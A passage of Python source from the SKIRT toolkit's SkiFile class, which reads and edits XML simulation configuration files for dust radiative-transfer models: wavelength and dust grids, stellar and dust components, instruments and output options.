# the updated contents of a SkiFile instance to another file (or to replace the original file if so desired).
#
# A SkiFile class instance is always constructed from an existing ski file; creating a new ski file from scratch
# is not supported. To create a new ski file, start SKIRT in interactive mode (without any arguments).
#
class SkiFile:
# ---------- Constructing and saving -----------------------------
## The constructor loads the contents of the specified ski file into a new SkiFile instance.
# The filename \em must end with ".ski" or with "_parameters.xml".
#
def __init__(self, filepath):
if not filepath.lower().endswith((".ski","_parameters.xml")):
raise ValueError("Invalid filename extension for ski file")
# Set the path to the ski file
self.path = os.path.expanduser(filepath)
# load the XML tree (remove blank text to avoid confusing the pretty printer when saving)
self.tree = etree.parse(arch.opentext(self.path), parser=etree.XMLParser(remove_blank_text=True))
# Replace path by the full, absolute path
self.path = os.path.abspath(self.path)
## This function saves the (possibly updated) contents of the SkiFile instance into the specified file.
# The filename \em must end with ".ski". Saving to and thus replacing the ski file from which this
# SkiFile instance was originally constructed is allowed, but often not the intention.
def saveto(self, filepath):
if not filepath.lower().endswith(".ski"):
raise ValueError("Invalid filename extension for ski file")
# update the producer and time attributes on the root element
root = self.tree.getroot()
root.set("producer", "Python Toolkit for SKIRT (SkiFile class)")
root.set("time", datetime.now().strftime("%Y-%m-%dT%H:%M:%S"))
# serialize the XML tree
outfile = open(os.path.expanduser(filepath), "wb")
outfile.write(etree.tostring(self.tree, encoding="UTF-8", xml_declaration=True, pretty_print=True))
outfile.close()
# Update the ski file path
self.path = filepath
## This function saves the ski file to the original path
def save(self): self.saveto(self.path)
## This function returns a copy (a deep copy) of this ski file
def copy(self):
ski = copy.deepcopy(self)
ski.path = None # set the path to None so this copy won't be involuntarily saved over the original file
return ski
# ---------- Retrieving information -------------------------------
## This function returns a SkirtUnits object initialized with the SKIRT unit system ('SI', 'stellar', or
# 'extragalactic') and the flux style ('neutral', 'wavelength' or 'frequency') specified in the ski file.
def units(self):
unitelements = self.tree.xpath("//units/*[1]")
if len(unitelements) == 1:
unitsystem = unitelements[0].tag
fluxstyle = unitelements[0].get("fluxOutputStyle", default='neutral')
else:
unitsystem = 'extragalactic'
fluxstyle = 'neutral'
return SkirtUnits(unitsystem, fluxstyle)
## This function returns the number of wavelengths for oligochromatic or panchromatic simulations
def nwavelengths(self):
# Try to get the list of wavelengths from the ski file
wavelengths = self.wavelengths()
# If the list is not empty, retun its size
if wavelengths: return len(wavelengths)
# If the list is empty, the ski file either represents a panchromatic simulation (and we can get the
# number of points directly from the tree) or a FileWavelengthGrid is used (in which case we raise an error)
entry = self.tree.xpath("//wavelengthGrid/*[1]")[0]
if entry.tag == 'FileWavelengthGrid':
raise ValueError("The number of wavelengths is not defined within the ski file. Call nwavelengthsfile().")
else:
return int(entry.get("points"))
## This function returns the name of the wavelengths file that is used for the simulation, if any
def wavelengthsfile(self):
entry = self.tree.xpath("//FileWavelengthGrid")
if entry: return entry[0].get("filename")
else: return None
## This function returns the number of wavelength points as defined in the wavelengths file
def nwavelengthsfile(self, input_path):
wavelengths_filename = self.wavelengthsfile()
wavelengths_path = os.path.join(input_path, wavelengths_filename)
with open(wavelengths_path, 'r') as f: first_line = f.readline()
nwavelengths = int(first_line.split("\n")[0])
return nwavelengths
## This function returns the number of photon packages per wavelength
def packages(self):
# Get the MonteCarloSimulation element
elems = self.tree.xpath("//OligoMonteCarloSimulation | //PanMonteCarloSimulation")
if len(elems) != 1: raise ValueError("No MonteCarloSimulation in ski file")
# Get the number of packages
return int(float(elems[0].get("packages")))
## This function returns the number of dust cells
def ncells(self):
xpoints = self.nxcells()
ypoints = 1
zpoints = 1
try:
ypoints = self.nycells()
except ValueError: pass
try:
zpoints = self.nzcells()
except ValueError: pass
# Return the total number of dust cells
return xpoints*ypoints*zpoints
## This function returns the number of dust cells in the x direction
def nxcells(self):
try:
xpoints = int(self.tree.xpath("//meshX/*")[0].get("numBins"))
except TypeError:
raise ValueError("The number of dust cels is not defined within the ski file")
return xpoints
## This function returns the number of dust cells in the y direction
def nycells(self):
try:
ypoints = int(self.tree.xpath("//meshY/*")[0].get("numBins"))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 2")
return ypoints
## This function returns the number of dust cells in the z direction
def nzcells(self):
try:
zpoints = int(self.tree.xpath("//meshZ/*")[0].get("numBins"))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 3")
return zpoints
## This function returns the dimension of the dust grid
def dimension(self):
# Try to find the number of points in the y direction
try:
int(self.tree.xpath("//dustGridStructure/*[1]")[0].get("pointsY"))
except TypeError:
return 1
# Try to find the number of points in the z direction
try:
int(self.tree.xpath("//dustGridStructure/*[1]")[0].get("pointsZ"))
except TypeError:
return 2
# If finding the number of ypoints and zpoints succeeded, the grid is 3-dimensional
return 3
## This function returns the number of dust components
def ncomponents(self):
components = self.tree.xpath("//CompDustDistribution/components/*")
return int(len(components))
## This function returns the number of dust library items
def nlibitems(self):
dustlib = self.tree.xpath("//dustLib/*")[0]
if dustlib.tag == "AllCellsDustLib":
return self.ncells()
elif dustlib.tag == "Dim2DustLib":
return dustlib.attrib["pointsTemperature"] * dustlib.attrib["pointsWavelength"]
elif dustlib.tag == "Dim1DustLib":
return dustlib.attrib["entries"]
## This function returns the number of dust populations (from all dust mixes combined)
def npopulations(self):
npops = 0
# For each dust mix
for dustmix in self.tree.xpath("//mix/*[1]"):
if dustmix.tag in ["InterstellarDustMix", "Benchmark1DDustMix", "Benchmark2DDustMix", "DraineLiDustMix"]:
npops += 1
elif dustmix.tag == "TrustDustMix":
npops += int(dustmix.attrib["graphitePops"])
npops += int(dustmix.attrib["silicatePops"])
npops += int(dustmix.attrib["PAHPops"])
elif dustmix.tag == "ConfigurableDustMix":
npops += len(self.tree.xpath("//ConfigurableDustMix/populations/*"))
return npops
## This function returns the number of simple instruments
def nsimpleinstruments(self):
return len(self.tree.xpath("//SimpleInstrument"))
## This function returns the number of full instruments
def nfullinstruments(self):
return len(self.tree.xpath("//FullInstrument"))
## This function returns whether transient heating is enabled
def transientheating(self):
return len(self.tree.xpath("//TransientDustEmissivity")) > 0
## This function returns whether dust emission is enabled
def dustemission(self):
return len(self.tree.xpath("//dustEmissivity"))
@property
def emission_boost(self):
try:
pandustsystem = self.tree.xpath("//PanDustSystem")[0]
return float(pandustsystem.attrib["emissionBoost"])
except:
raise ValueError("Not a panchromatic simulation")
## This function returns whether dust selfabsorption is enabled
def dustselfabsorption(self):
try:
pandustsystem = self.tree.xpath("//PanDustSystem")[0]
return (pandustsystem.attrib["selfAbsorption"] == "true")
except:
return False
## This function returns whether data parallelization is enabled
def dataparallel(self):
return False # Not merged into the main SKIRT version yet
def enable_selfabsorption(self):
# Get the dust system
dust_system = self.get_dust_system()
# Check if the dust system is of type 'PanDustSystem'
if dust_system.tag != "PanDustSystem": raise ValueError("Not a panchromatic simulation")
# Enable dust self-absorption
dust_system.set("selfAbsorption", "true")
def disable_selfabsorption(self):
# Get the dust system
dust_system = self.get_dust_system()
# Check if the dust system is of type 'PanDustSystem'
if dust_system.tag != "PanDustSystem": raise ValueError("Not a panchromatic simulation")
# Disable dust self-absorption
dust_system.set("selfAbsorption", "false")
def enable_all_dust_system_writing_options(self):
# Get the dust system
dust_system = self.get_dust_system()
# Loop over all elements of the dust system
for element in dust_system.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to true
element.set(setting_name, "true")
def set_write_convergence(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeConvergence' setting to true
dust_system.set("writeConvergence", str_from_bool(value))
def set_write_density(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeDensity' setting to true
dust_system.set("writeDensity", str_from_bool(value))
def set_write_depth_map(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeDepthMap' setting to true
dust_system.set("writeDepthMap", str_from_bool(value))
def set_write_quality(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeQuality' setting to true
dust_system.set("writeQuality", str_from_bool(value))
def set_write_cell_properties(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeCellProperties' setting to true
dust_system.set("writeCellProperties", str_from_bool(value))
def set_write_stellar_density(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeStellarDensity' setting to true
dust_system.set("writeStellarDensity", str_from_bool(value))
def set_write_cells_crossed(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeCellsCrossed' setting to true
dust_system.set("writeCellsCrossed", str_from_bool(value))
def set_write_emissivity(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeEmissivity' setting to true
dust_system.set("writeEmissivity", str_from_bool(value))
def set_write_temperature(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeTemperature' setting to true
dust_system.set("writeTemperature", str_from_bool(value))
def set_write_isrf(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeISRF' setting to true
dust_system.set("writeISRF", str_from_bool(value))
def set_write_absorption(self, value=True):
# Get the dust system
dust_system = self.get_dust_system()
# Set the 'writeAbsorption' setting to true
dust_system.set("writeAbsorption", str_from_bool(value))
def set_write_grid(self, value=True):
# Get the dust grid
grid = self.get_dust_grid()
# Set the 'writeGrid' setting to true
grid.set("writeGrid", str_from_bool(value))
def disable_all_dust_system_writing_options(self):
# Get the dust system
dust_system = self.get_dust_system()
# Loop over all elements of the dust system
for element in dust_system.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to true
element.set(setting_name, "false")
def enable_all_writing_options(self):
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to true
element.set(setting_name, "true")
def disable_all_writing_options(self):
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Check if any of the settings of this element is a writing option
for setting_name, setting_value in element.items():
# Skip settings that are not writing settings
if not setting_name.startswith("write"): continue
# Set the setting to false
element.set(setting_name, "false")
## This function returns the number of pixels for each of the instruments
def npixels(self, nwavelengths=None):
pixels = []
nwavelengths = nwavelengths if nwavelengths is not None else self.nwavelengths()
instruments = self.tree.xpath("//instruments/*")
for instrument in instruments:
type = instrument.tag
name = instrument.attrib["instrumentName"]
datacube = int(instrument.attrib["pixelsX"])*int(instrument.attrib["pixelsY"])*nwavelengths
if type == "SimpleInstrument":
pixels.append([name, type, datacube])
elif type == "FullInstrument":
scattlevels = int(instrument.attrib["scatteringLevels"])
scattering = scattlevels + 1 if scattlevels > 0 else 0
dustemission = 1 if self.dustemission() else 0
npixels = datacube * (3 + scattering + dustemission)
pixels.append([name, type, npixels])
return pixels
## This function returns a list of the wavelengths specified in the ski file for an oligochromatic simulation,
# in micron. If the ski file specifies a panchromatic simulation, the function returns an empty list.
# The current implementation requires that the wavelengths in the ski file are specified in micron.
def wavelengths(self):
# get the value of the wavelengths attribute on the OligoWavelengthGrid element (as a list of query results)
results = self.tree.xpath("//OligoWavelengthGrid/@wavelengths")
# if not found, return an empty list
if len(results) != 1: return []
# split the first result in separate strings, extract the numbers using the appropriate units
units = self.units()
return [units.convert(s,to_unit='micron',quantity='wavelength') for s in results[0].split(",")]
## This function returns the first instrument's distance, in the specified units (default is 'pc').
def instrumentdistance(self, unit='pc'):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
# get the distance including the unit string
distance = instruments[0].get("distance")
# convert to requested units
return self.units().convert(distance, to_unit=unit, quantity='distance')
## This function returns the shape of the first instrument's frame, in pixels.
def instrumentshape(self):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
# get its shape
return ( int(instruments[0].get("pixelsX")), int(instruments[0].get("pixelsY")) )
## This function returns the angular area (in sr) of a single pixel in the first instrument's frame.
def angularpixelarea(self):
# get the first instrument element
instruments = self.tree.xpath("//instruments/*[1]")
if len(instruments) != 1: raise ValueError("No instruments in ski file")
instrument = instruments[0]
# get the distance in m
d = self.units().convert(instrument.get("distance"), to_unit='m', quantity='distance')
# get the field of view in m
fovx = self.units().convert(instrument.get("fieldOfViewX"), to_unit='m', quantity='length')
fovy = self.units().convert(instrument.get("fieldOfViewY"), to_unit='m', quantity='length')
# get the number of pixels
nx = int(instrument.get("pixelsX"))
ny = int(instrument.get("pixelsY"))
# calculate the angular pixel area
sx = 2 * arctan(fovx / nx / d / 2)
sy = 2 * arctan(fovy / ny / d / 2)
return sx * sy
## This function returns a list of instrument names, in order of occurrence in the ski file.
def instrumentnames(self):
# get the instrument elements
instruments = self.tree.xpath("//instruments/*")
# return their names
return [ instr.get("instrumentName") for instr in instruments ]
## This function returns the dust fraction specified in an SPHDustDistribution,
# or 0 if the element or the attribute are not present.
def dustfraction(self):
# get the value of the relevant attribute on the SPHDustDistribution element (as a list of query results)
results = self.tree.xpath("//SPHDustDistribution/@dustFraction")
# if not found, return zero
if len(results) != 1: return 0
# convert the first result
return float(results[0])
## This function returns the maximum gas temperature specified in an SPHDustDistribution, in Kelvin,
# or 0 if the element or the attribute are not present.
def maximumtemperature(self):
# get the value of the relevant attribute on the SPHDustDistribution element (as a list of query results)
results = self.tree.xpath("//SPHDustDistribution/@maximumTemperature")
# if not found, return zero
if len(results) != 1: return 0
# extract the number from the first result, assuming units of K
return float(results[0].split()[0])
## This function returns whether the ski file describes a oligochromatic simulation
def oligochromatic(self):
elems = self.tree.xpath("//OligoMonteCarloSimulation")
return len(elems) > 0
## This function returns whether the ski file describes a panchromatic simulation
def panchromatic(self):
elems = self.tree.xpath("//PanMonteCarloSimulation")
return len(elems) > 0
## This function converts the ski file to a ski file that describes an oligochromatic simulation
def to_oligochromatic(self, wavelengths):
if self.oligochromatic(): warnings.warn("The simulation is already oligochromatic")
else:
simulation = self.tree.xpath("//PanMonteCarloSimulation")[0]
simulation.tag = "OligoMonteCarloSimulation"
# Remove the old wavelength grid
wavelength_grid = self.get_wavelength_grid()
parent = wavelength_grid.getparent()
parent.set("type", "OligoWavelengthGrid")
parent.remove(wavelength_grid)
# Make the oligochromatic wavelength grid
attrs = {"wavelengths": ", ".join(map(str_from_quantity, wavelengths))}
parent.append(parent.makeelement("OligoWavelengthGrid", attrs))
components = self.get_stellar_components()
for component in components:
component.tag = "OligoStellarComp"
component.set("luminosities", "1")
for child in component.getchildren():
if child.tag == "sed" or child.tag == "normalization": component.remove(child)
dust_system = self.get_dust_system()
parent = dust_system.getparent()
parent.set("type", "OligoDustSystem")
dust_system.tag = "OligoDustSystem"
dust_system.attrib.pop("writeAbsorption")
dust_system.attrib.pop("writeISRF")
dust_system.attrib.pop("writeTemperature")
dust_system.attrib.pop("writeEmissivity")
dust_system.attrib.pop("selfAbsorption")
dust_system.attrib.pop("emissionBoost")
for child in dust_system.getchildren():
if child.tag == "dustEmissivity" or child.tag == "dustLib": dust_system.remove(child)
## This function converts the ski file to a ski file that describes a panchromatic simulation
def to_panchromatic(self):
if self.panchromatic(): warnings.warn("The simulation is already panchromatic")
else:
simulation = self.tree.xpath("//OligoMonteCarloSimulation")[0]
simulation.tag = "PanMonteCarloSimulation"
# ---------- Updating information ---------------------------------
## This function applies an XSLT transform to the ski file if an XPath condition evaluates to true.
# The first argument is a string specifying an XPath 1.0 expression to be evaluated in the context of the XML
# document representing the ski file; the expression value is converted to boolean according to XPath semantics.
# If the value is true, the XSLT 1.0 transform specified in the second argument is applied to the XML document,
# and the result replaces the original document. The second argument is a string containing one or more
# \<xsl:template\> elements that specify the changes to be applied to the document. The \<xsl:stylesheet\>
# element and the identity template are automatically added and must not be contained in the argument string.
# The function returns true if the transform was applied, and false if it was not (i.e. the document is unchanged).
def transformif(self, condition, templates):
needed = self.tree.xpath("boolean(" + condition + ")")
if needed:
prefix = '''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:apply-templates select="@*|node()"/>
</xsl:copy>
</xsl:template>'''
postfix = '''</xsl:stylesheet>'''
transform = etree.XSLT(etree.XML(prefix + templates + postfix))
self.tree = transform(self.tree)
return needed
## This function sets the number of photon packages on the MonteCarloSimulation element in the ski file
# to the specified value
def setpackages(self, number):
# get the MonteCarloSimulation element
elems = self.tree.xpath("//OligoMonteCarloSimulation | //PanMonteCarloSimulation")
if len(elems) != 1: raise ValueError("No MonteCarloSimulation in ski file")
# set the attribute value
elems[0].set("packages", str(number))
## This function sets the number of wavelengths
def setnwavelengths(self, number):
elems = self.tree.xpath("//wavelengthGrid/*[1]")
elems[0].set("points", str(number))
## This function sets the number of dust cells in the x direction
def setxdustcells(self, number):
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsX", str(number))
## This function sets the number of dust cells in the y direction
def setydustcells(self, number):
try:
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsY", str(number))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 2")
## This function sets the number of dust cells in the z direction
def setzdustcells(self, number):
try:
self.tree.xpath("//dustGridStructure/*[1]")[0].set("pointsZ", str(number))
except TypeError:
raise ValueError("The dimension of the dust grid is lower than 3")
## This function increases the number of photon packages by a certain factor
def increasepackages(self, factor):
# Set the increased number of packages
self.setpackages(self.packages()*factor)
## This function increases the number of dust cells by a certain factor
def increasedustcells(self, factor):
# Get the dimension of the dust grid
dimension = self.dimension()
# Set the increased number of dust cells in the x direction
self.setxdustcells(int(round(self.nxcells() * factor**(1 / float(dimension)))))
# Set the increased number of dust cells in the y direction
if dimension > 1: self.setydustcells(int(round(self.nycells() * factor**(1 / float(dimension)))))
# Set the increased number of dust cells in the z direction
if dimension > 2: self.setzdustcells(int(round(self.nzcells() * factor**(1 / float(dimension)))))
## This function sets the maximum mass fraction of the tree dust grid in the ski file
# to the specified value
def setmaxmassfraction(self, number):
# get the tree dust grid element
elems = self.tree.xpath("//BinTreeDustGrid | //OctTreeDustGrid")
if len(elems) != 1: raise ValueError("No tree dust grid in ski file")
# set the attribute value
elems[0].set("maxMassFraction", str(number))
## This function sets the dust fraction of the SPH dust distribution in the ski file
# to the specified value
def setdustfraction(self, number):
# get the tree dust grid element
elems = self.tree.xpath("//SPHDustDistribution")
if len(elems) != 1: raise ValueError("No SPHDustDistribution in ski file")
# set the attribute value
elems[0].set("dustFraction", str(number))
## This function replaces any instruments in the ski file by a new list of perspective instruments
# corresponding to the movie frames defined in the specified list. The instruments are named "0",
# "1", "2"... corresponding to the zero-based frame index in the list. Each frame is given as a tuple
# containing the following information: viewport shape (in pixels), viewport size, viewport position,
# crosshair position, upwards position, and focal length (all in world coordinates, expressed in the
# default units for length in the target ski file).
# The components of each item are grouped in tuples, so the structure of the complete list is:
# [ ((Nx,Ny),(Sx,Sy),(Vx,Vy,Vz),(Cx,Cy,Cz),(Ux,Uy,Uz),Fe) , ... ]
def setperspectiveinstruments(self, frames):
# get the instruments element
parents = self.tree.xpath("//instruments")
if len(parents) == 0: raise ValueError("No 'instruments' element in ski file")
if len(parents) > 1: raise ValueError("Multiple 'instruments' elements in ski file")
parent = parents[0]
# remove the old instruments
for instrument in parent.getchildren():
parent.remove(instrument)
# add a new instrument for each frame
index = 0
for pixels,size,view,cross,up,focal in frames:
attrs = { "instrumentName" : str(index),
"pixelsX" : str(pixels[0]), "pixelsY" : str(pixels[1]), "width" : str(size[0]),
"viewX" : str(view[0]), "viewY" : str(view[1]), "viewZ" : str(view[2]),
"crossX" : str(cross[0]), "crossY" : str(cross[1]), "crossZ" : str(cross[2]),
"upX" : str(up[0]), "upY" : str(up[1]), "upZ" : str(up[2]), "focal" : str(focal) }
parent.append(parent.makeelement("PerspectiveInstrument", attrs))
index += 1
## This function sets the filename attribute of the SPHStellarComp element to the specified value.
def setstarfile(self, filename):
# get the SPHStellarComp element
elems = self.tree.xpath("//SPHStellarComp[./sedFamily/BruzualCharlotSEDFamily]")
if len(elems) != 1: raise ValueError("No SPHStellarComp with BruzualCharlotSEDFamily in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets the filename attribute of the SPHStarburstComp element to the specified value.
def sethiifile(self, filename):
# get the SPHStarburstComp element
elems = self.tree.xpath("//SPHStellarComp[./sedFamily/MappingsSEDFamily]")
if len(elems) != 1: raise ValueError("No SPHStellarComp with MappingsSEDFamily in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets the filename attribute of the SPHDustDistribution element to the specified value.
def setgasfile(self, filename):
# get the SPHDustDistribution element
elems = self.tree.xpath("//SPHDustDistribution")
if len(elems) != 1: raise ValueError("No SPHDustDistribution in ski file")
# set the attribute value
elems[0].set("filename", filename)
## This function sets any extentX, extentY and extentZ attributes to the specified value (converted to a string),
# regardless of the element in which such attributes reside.
def setextent(self, value):
strvalue = str(value)
for attr in self.tree.xpath("//*/@extentX"): attr.getparent().set("extentX", strvalue)
for attr in self.tree.xpath("//*/@extentY"): attr.getparent().set("extentY", strvalue)
for attr in self.tree.xpath("//*/@extentZ"): attr.getparent().set("extentZ", strvalue)
## This function returns the stellar system
def get_stellar_system(self):
return self.get_unique_base_element("stellarSystem")
## This function returns the dust system
def get_dust_system(self):
return self.get_unique_base_element("dustSystem")
## This function removes the complete dust system
def remove_dust_system(self):
dust_system = self.get_dust_system()
parent = dust_system.getparent()
parent.getparent().remove(parent)
## This function returns the list of stellar components
def get_stellar_components(self, include_comments=False):
# Get the stellar system
stellar_system = self.get_stellar_system()
# Get the 'components' element
stellar_components_parents = stellar_system.xpath("components")
# Check if only one 'components' element is present
if len(stellar_components_parents) == 0: raise ValueError("Stellar system is not composed of components")
elif len(stellar_components_parents) > 1: raise ValueError("Invalid ski file: multiple 'components' objects within stellar system")
stellar_components = stellar_components_parents[0]
# Return the stellar components as a list
if include_comments: return stellar_components.getchildren()
else: return [component for component in stellar_components.getchildren() if component.tag is not etree.Comment]
## This function returns the list of stellar component names
def get_stellar_component_ids(self):
# Initialize a list to contain the component ids
ids = []
# Get the list of stellar components
components = self.get_stellar_components(include_comments=True)
# keep track of the number of actual components
number_of_components = 0
# Loop over the components (also includes the comments)
i = 0
while i < len(components):
if components[i].tag is etree.Comment:
ids.append(components[i].text.strip())
i += 2 # skip the next component -> it is the component corresponding to this comment
# No name -> add the index of this component as the ID
else:
ids.append(number_of_components)
i += 1
# Increment the number of components
number_of_components += 1
# Return the list of names
return ids
## This function returns the dust distribution
def get_dust_distribution(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust distribution
return get_unique_element(dust_system, "dustDistribution")
## This function returns the list of dust components
def get_dust_components(self, include_comments=False):
# Get the dust distribution
dust_distribution = self.get_dust_distribution()
# Check whether the dust distribution is a CompDustDistribution
if not dust_distribution.tag == "CompDustDistribution": raise ValueError("Dust distribution is not composed of components")
# Get the 'components' element
dust_components_parents = dust_distribution.xpath("components")
# Check if only one 'components' element is present
if len(dust_components_parents) == 0: raise ValueError("Dust distribution is not composed of components")
elif len(dust_components_parents) > 1: raise ValueError("Invalid ski file: multiple 'components' objects within dust distribution")
dust_components = dust_components_parents[0]
# Return the dust components as a list
if include_comments: return dust_components.getchildren()
else: return [component for component in dust_components.getchildren() if component.tag is not etree.Comment]
## This functions returns a list with the ids of the different dust components (the id is a name if this is defined
# for the component, otherwise it is the index of the component)
def get_dust_component_ids(self):
# Initialize a list to contain the component ids
ids = []
# Get the list of dust components
components = self.get_dust_components(include_comments=True)
# keep track of the number of actual components
number_of_components = 0
# Loop over the components (also includes the comments)
i = 0
while i < len(components):
if components[i].tag is etree.Comment:
ids.append(components[i].text.strip())
i += 2 # skip the next component -> it is the component corresponding to this comment
# No name -> add the index of this component as the ID
else:
ids.append(number_of_components)
i += 1
# Increment the number of components
number_of_components += 1
# Return the list of names
return ids
## This function returns the stellar component that is recognized by the specified id (index or name)
def get_stellar_component(self, component_id):
# The component identifier is an integer number -> index of stellar components
if isinstance(component_id, int):
# Get all the stellar components (without comments)
components = self.get_stellar_components()
# Return the stellar component with the specified index
return components[component_id]
# The component identifier is a string -> get stellar component based on description
elif isinstance(component_id, basestring):
# Get the stellar components
components = self.get_stellar_components(include_comments=True)
# Loop over the different components
for child in components:
if child.tag is etree.Comment and child.text.strip() == component_id:
# Return the child element right after the comment element
return child.getnext()
# If no match is found, give an error
raise ValueError("No stellar component found with description '" + component_id + "'")
# Invalid component id
else: raise ValueError("Invalid component identifier (should be integer or string)")
## This function returns the dust component that is recognized by the specified id (index or name)
def get_dust_component(self, component_id):
# The component identifier is an integer number -> index of dust components
if isinstance(component_id, int):
# Get all the dust components (without comments)
components = self.get_dust_components()
# Return the dust component with the specified index
return components[component_id]
# The component identifier is a string -> get dust component based on description
elif isinstance(component_id, basestring):
# Get the dust components
components = self.get_dust_components(include_comments=True)
# Loop over the different components
for child in components:
if child.tag is etree.Comment and child.text.strip() == component_id:
# Return the child element right after the comment element
return child.getnext()
# If no match is found, give an error
raise ValueError("No dust component found with description '" + component_id + "'")
# Invalid component id
else: raise ValueError("Invalid component identifier (should be integer or string)")
## This functions removes the stellar component with the specified ID
def remove_stellar_component(self, component_id):
# Get the stellar component with the specified ID
component = self.get_stellar_component(component_id)
# Get the previous item
previous = component.getprevious()
# Get the parent
parent = component.getparent()
# Check whether the previous item is a comment
if previous.tag is etree.Comment:
# If the comment states the component ID, remove it
if previous.text.strip() == component_id: parent.remove(previous)
# If the comment preceeding the component does not have the name of that component (it must by definition),
# something strange is going on ...
else: raise ValueError("Something is wrong with the ski file")
# Remove the stellar component
parent.remove(component)
## This function removes the dust component with the specified ID
def remove_dust_component(self, component_id):
# Get the dust component with the specified ID
component = self.get_dust_component(component_id)
# Get the previous item
previous = component.getprevious()
# Get the parent
parent = component.getparent()
# Check whether the previous item is a comment
if previous.tag is etree.Comment:
# If the comment states the component ID, remove it
if previous.text.strip() == component_id: parent.remove(previous)
# If the comment preceeding the component does not have the name of that component (it must by definition),
# something strange is going on ...
else: raise ValueError("Something is wrong with the ski file")
# Remove the dust component
parent.remove(component)
## This function removes the stellar components except for the component(s) with the specified ID(s)
def remove_stellar_components_except(self, component_ids):
if isinstance(component_ids, basestring): component_ids = [component_ids]
# Loop over the stellar component IDs
for id_i in self.get_stellar_component_ids():
# Skip IDs that are specified by the user
if id_i in component_ids: continue
# Remove all other stellar components
self.remove_stellar_component(id_i)
## This function removes the dust components except for the component(s) with the specified ID(s)
def remove_dust_components_except(self, component_ids):
if isinstance(component_ids, basestring): component_ids = [component_ids]
# Loop over the stellar component IDs
for id_i in self.get_dust_component_ids():
# Skip IDs that are specified by the user
if id_i in component_ids: continue
# Remove all other dust components
self.remove_dust_component(id_i)
## This function returns all properties of the stellar component with the specified id
def get_stellar_component_properties(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Get the properties
return get_properties(stellar_component)
## This function returns all properties of the stellar component with the specified id
def get_dust_component_properties(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Get the properties
return get_properties(dust_component)
## This functions returns the normalization of the stellar component with the specified id
def get_stellar_component_normalization(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Get normalization of this component
return get_unique_element(stellar_component, "normalization")
## This function returns the luminosity of the stellar component with the specified id,
# - if the normalization is by bolometric luminosity, returns (luminosity [as Astropy quantity], None)
# - if the normalization is by luminosity in a specific band, returns (luminosity [as Astropy quantity], Filter object)
# - if the normalization is by spectral luminosity at a specific wavelength, returns (spectral luminosity [as Astropy quantity], wavelength [as Astropy quantity])
def get_stellar_component_luminosity(self, component_id):
# Get the stellar component normalization of the component
normalization = self.get_stellar_component_normalization(component_id)
# Check the type of the normalization
if normalization.tag == "BolLuminosityStellarCompNormalization":
# Return the total luminosity and None for the band
return get_quantity(normalization, "luminosity", default_unit="Lsun"), None
elif normalization.tag == "LuminosityStellarCompNormalization":
# Return the luminosity and the corresponding band
return get_quantity(normalization, "luminosity"), Filter.from_string(normalization.get("band"))
elif normalization.tag == "SpectralLuminosityStellarCompNormalization":
# The (spectral) luminosity
luminosity = get_quantity(normalization, "luminosity")
# The wavelength
wavelength = get_quantity(normalization, "wavelength")
# Return the luminosity and the wavelength as quantities
return luminosity, wavelength
## For oligochromatic simulations
def set_stellar_component_luminosities(self, component_id, luminosities):
# Get the stellar component normalization of the component
component = self.get_stellar_component(component_id)
# Set the 'luminosities' attribute
component.set("luminosities", " ".join(map(str, luminosities)))
## This function sets the luminosity of the stellar component with the specified id,
# - if filter_or_wavelength is None, the specified luminosity [as Astropy quantity] is interpreted as a bolometric luminosity
# - if filter_or_wavelength is a Filter instance, the luminosity [as Astropy quantity] is interpreted as the luminosity in the corresponding band
# - if filter_or_wavelength is a wavelength [as an Astropy quantity], the luminosity should be the spectral luminosity [as Astropy quantity] at that wavelength
def set_stellar_component_luminosity(self, component_id, luminosity, filter_or_wavelength=None):
# Get the stellar component normalization of the component
normalization = self.get_stellar_component_normalization(component_id)
# No filter or wavelength is defined, use BolLuminosityStellarCompNormalization
if filter_or_wavelength is None:
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity" : str_from_quantity(luminosity, unit="Lsun")}
parent.append(parent.makeelement("BolLuminosityStellarCompNormalization", attrs))
# Filter is defined, use LuminosityStellarCompNormalization
elif isinstance(filter_or_wavelength, Filter):
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity": str_from_quantity(luminosity), "band": filter_or_wavelength.skirt_description}
